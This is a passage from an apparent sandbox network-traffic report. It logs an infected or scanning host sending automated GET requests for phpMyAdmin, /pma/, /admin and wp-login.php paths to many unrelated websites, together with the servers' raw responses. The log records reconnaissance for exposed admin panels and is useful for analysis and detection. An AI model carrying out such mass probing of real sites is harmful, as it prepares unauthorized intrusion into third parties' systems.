Feb 21, 2024 00:26:12.751651049 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/phpMyAdmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471572.627735661083110285 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLgusAIMgWk1Brq+Ibw9VA8kG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRalrYG6X4Z4OVT4gysegX7mpvHrTpIxDnqWw+DFjsZCwstu7lYtpl8WcidJkbJwmlqug= Data Raw: Data Ascii:
Feb 21, 2024 00:26:12.751662016 CET	261	IN	Data Raw: 2c 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4c 66 42 30 48 37 62 64 52 50 67 54 52 74 63 37 74 71 6e 4f 7a 70 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 Data Ascii: ,2UNV7KOq4oGjA5+PKsX47LfB0H7bdRPgTRtc7tqnOzpjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+CLIiD8kgg4qaApVirf92SI=,9n3wTMzaU7zAZzBAj7gVU3xzs14Y+p+m9S0cqQivCGn4D2PFRhC5HA4zrltzn4LTlHOG+GwLYmOcfELWQDhqSQ==Cache-Control: no-cacheX-Content-Type-Op

Session ID	Source IP	Source Port	Destination IP	Destination Port
302	192.168.2.6	61562	188.40.92.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.539834976 CET	168	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.714441061 CET	139	IN	HTTP/1.1 302 Found Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
303	192.168.2.6	61679	3.33.139.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.544604063 CET	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.690042973 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:12.894093990 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
304	192.168.2.6	61618	213.186.33.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.563365936 CET	176	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: pharmacie-vp.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.735167980 CET	459	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 20 Feb 2024 23:26:12 GMT content-type: text/html content-length: 138 location: http://imp.ovh.net x-iplb-request-id: BF60E3DE:F0B2_D5BA2105:0050_65D53514_63A45B91:737F x-iplb-instance: 52193 set-cookie: SERVERID77446=200175\|ZdU1F\|ZdU1F; path=/; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
305	192.168.2.6	61613	78.47.2.70	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.573772907 CET	177	OUT	GET /admin HTTP/1.1 Host: breecetechnology.co.za Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.753979921 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
306	192.168.2.6	60843	218.213.216.154	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.573882103 CET	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.871994972 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Last-Modified: Wed, 21 Mar 2018 06:16:02 GMT ETag: "696-567e62015ec80" Accept-Ranges: bytes Content-Length: 1686 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 32 45 38 31 41 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 7d 0a 20 20 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 70 78 20 30 20 32 34 70 78 20 30 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 36 36 36 3b 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>ERROR 404 - Not Found!</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex" /> <style type="text/css">... body { color: #444444; background-color: #EEEEEE; font-family: 'Trebuchet MS', sans-serif; font-size: 80%; } h1 {} h2 { font-size: 1.2em; } #page{ background-color: #FFFFFF; width: 60%; margin: 24px auto; padding: 12px; } #header { padding: 6px ; text-align: center; } .status3xx { background-color: #475076; color: #FFFFFF; } .status4xx { background-color: #C55042; color: #FFFFFF; } .status5xx { background-color: #F2E81A; color: #000000; } #content { padding: 4px 0 24px 0; } #footer { color: #666666;
Feb 21, 2024 00:26:12.872059107 CET	636	IN	Data Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 39 66 39 66 39 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 35 70 78 20 23 Data Ascii: background: #f9f9f9; padding: 10px 20px; border-top: 5px #efefef solid; font-size: 0.8em; text-align: center; } #footer a { color: #999999; } --></style></head><body> <div i

Session ID	Source IP	Source Port	Destination IP	Destination Port
307	192.168.2.6	61715	45.136.114.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.592144012 CET	170	OUT	GET /pma/ HTTP/1.1 Host: archononline.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.697988987 CET	439	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
308	192.168.2.6	61654	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.600446939 CET	178	OUT	GET /wp-login.php HTTP/1.1 Host: netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.995217085 CET	1286	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/ Content-Encoding: gzip Data Raw: 34 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 56 c1 6e dc 36 10 3d 5b 5f 41 ab 88 b5 06 ac 95 37 6d d0 24 96 d6 88 63 17 c8 21 8d 81 ba 28 da c0 30 28 72 76 c5 9a 22 15 92 5a 79 1d f8 cf 7a eb 8f 75 48 49 b6 8c a6 ad db 43 2f 2b 71 38 1c bd 79 33 6f b8 f9 ee e9 87 b7 17 3f 9f 9f 91 ca d5 72 19 ed e4 bb 69 fa 51 ac c8 bb 33 f2 f2 12 d7 3b b9 df 20 37 b5 54 b6 88 2b e7 9a d7 59 d6 75 dd bc fb 7a ae cd 3a 5b bc 7a f5 2a bb f1 3e 31 61 92 5a 74 12 f0 32 26 92 aa 75 11 73 48 4f cf e2 fe f4 eb 55 79 1f 40 af 9b 79 0d 99 b2 d9 aa fc 6a dc a7 9c bb 4a 3c fe ca 60 9b 33 5d 67 15 c8 26 a3 8d 48 6d 03 2c 26 01 ec 47 50 5c ac 2e d3 74 02 7d 77 e6 c1 ef 93 cb a5 4f e6 5f e6 f0 3f e1 4e d3 7c f7 11 f6 0a 28 f7 39 d4 e0 28 d6 c2 35 29 7c 6a c5 a6 88 df 6a e5 40 b9 f4 62 db 00 52 dc af 8a d8 c1 8d cb 3c ed 47 84 55 d4 58 70 c5 8f 17 df a5 c8 7c e6 c3 38 e1 24 2c bf 07 77 6b 59 a5 44 63 41 12 0e 86 fc a0 99 a0 92 bc 07 2e 28 39 91 7a 4d f6 a4 a5 9f 5a 7d 44 de a8 1a 24 07 95 67 fd 61 8c 22 85 ba 26 06 64 91 70 65 d3 c6 c0 0a 1c ab 12 52 e1 5b 91 64 99 9d 77 be 09 12 ff cd 89 b3 75 5b 09 b6 02 70 a3 eb a4 6f d4 14 d3 9c 43 d6 35 29 e5 b5 50 99 d4 94 a7 fd d9 79 53 35 c7 ac 58 ec d1 ba 39 e2 c2 14 d2 99 f0 ee 7d 9e bd 38 79 f6 e2 b4 e0 d4 56 02 f9 b0 07 65 eb 9c 7f ae b4 a9 ed 81 5c 1c aa 03 cc 4c a8 70 62 03 a6 f8 66 fe ed fc f9 cb 84 38 e4 b0 48 02 75 cc da 84 d4 9e 86 22 a1 52 86 14 06 f6 15 ad d1 cb e8 52 3b f4 19 19 4f 94 16 8a c3 cd 81 d2 d4 b0 4a 6c e0 0b 67 90 20 63 c0 4c 4e 59 67 04 73 a9 36 02 01 a5 5d 05 2a 65 46 5b 3b 58 fa 18 d3 0f c7 1b 01 5d a3 8d 9b 14 bb 13 a8 8c 82 c3 46 30 48 c3 a2 2f f3 4e 8e a2 e8 fb a6 d4 7c 3b 0a 30 24 4f c2 6f 4a 99 13 5a a5 bd 09 a9 66 da 40 da 0a 82 db 8c 4a 48 51 a1 1c e2 20 12 2e 36 44 f0 22 0e be bd a9 5a 2c 73 6c 47 5f ee a0 7d 8b e2 e7 30 ef b4 e1 d8 0d d6 86 11 10 93 d0 30 45 7c ae 3b 30 c0 49 b9 25 3f a1 c7 b9 f7 c0 4d 5a 06 e2 8a 38 5d c4 4f 69 c9 3c a3 4b 4c 6c 81 a0 a2 dc d7 94 84 8a f4 b8 fc 3a 7e 80 d9 2f fb 24 ef a7 8b 1f 4f 5f 6a b3 90 98 6f ad 18 2b ef 2a 8d b9 36 da 3a 9f 6a de 04 0a 24 2d 51 28 18 b4 88 5b 0b e6 6a a0 e2 04 54 eb 6e c1 78 1c 44 7b 1d 9d a5 ef a9 90 e9 1b ee 73 84 bc 34 41 76 3b b9 50 4d eb fa 3e 0b 12 8d 1f b0 f7 a8 27 61 c7 72 85 33 31 d9 50 d9 42 11 c7 c4 8a 5b 7c 3e 3f f4 35 ce b3 00 c9 23 cc 3c c4 bf c0 d9 e0 e0 8d 97 e7 f8 8b a5 71 5f 86 e3 7d 7c e1 46 48 4d 87 af be de 01 52 88 f0 5f 10 21 a4 f1 18 f2 b6 06 57 83 d2 c8 69 3e e1 d2 40 0d 75 09 a6 c6 4e 1b 28 ea 4b 3a d9 18 48 63 15 b0 eb 52 df f4 d0 a6 fb 03 3f f8 11 40 4d c7 04 d9 c1 99 b5 c6 d0 38 b5 1c 29 25 88 d2 4f af 9e b0 91 ae 11 9b Data Ascii: 4b2Vn6=[_A7m$c!(0(rv"ZyzuHIC/+q8y3o?riQ3; 7T+Yuz:[z>1aZt2&usHOUy@yjJ<`3]g&Hm,&GP\.t}wO_?N\|(9(5)\|jj@bR<GUXp\|8$,wkYDcA.(9zMZ}D$ga"&dpeR[dwu[poC5)PyS5X9}8yVe\Lpbf8Hu"RR;OJlg cLNYgs6]eF[;X]F0H/N\|;0$OoJZf@JHQ .6D"Z,slG_}00E\|;0I%?MZ8]Oi<KLl:~/$O_jo+*6:j$-Q([jTnxD{s4Av;PM>'ar31PB[\|>?5#<q_}\|FHMR_!Wi>@uN(K:HcR?@M8)%O
Feb 21, 2024 00:26:12.995240927 CET	347	IN	Data Raw: 6d cb 5a 84 52 3f 2e d2 60 1f ca 84 02 19 0d 9e 99 c9 72 b8 db fa 51 43 fa 07 4e 44 51 53 b3 1d 97 92 62 fe f7 85 1c e7 e9 28 d5 69 6b 54 82 e3 a4 1d 2b 81 9a 11 06 98 bb 72 fa fe f4 93 26 e6 3f 87 76 60 1d d3 fa 5a 3c e0 5a f4 a7 02 41 79 e6 05 Data Ascii: mZR?.`rQCNDQSb(ikT+r&?v`Z<ZAy",OXMPT}:(QN}v:Q^Qt[fD3K+(Vtu]4klsAnFFGg#N;#$6r'w\|<0?\|_*\|Gn[X"E

Session ID	Source IP	Source Port	Destination IP	Destination Port
309	192.168.2.6	61707	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.642308950 CET	170	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.826824903 CET	431	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Location: https://eskimo.ch/phpMyAdmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
310	192.168.2.6	60996	59.106.13.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.661792994 CET	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: mlbx.matrix.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.942615986 CET	294	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
311	192.168.2.6	61718	81.169.145.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.663592100 CET	190	OUT	GET /phpmyadmin/ HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.840806961 CET	485	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache/2.4.58 (Unix) Location: https://creativ-moebelwerkstaetten.de/phpmyadmin/ Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 72 65 61 74 69 76 2d 6d 6f 65 62 65 6c 77 65 72 6b 73 74 61 65 74 74 65 6e 2e 64 65 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://creativ-moebelwerkstaetten.de/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
312	192.168.2.6	61855	217.160.0.208	80

Timestamp	Bytes transferred	Direction	Data
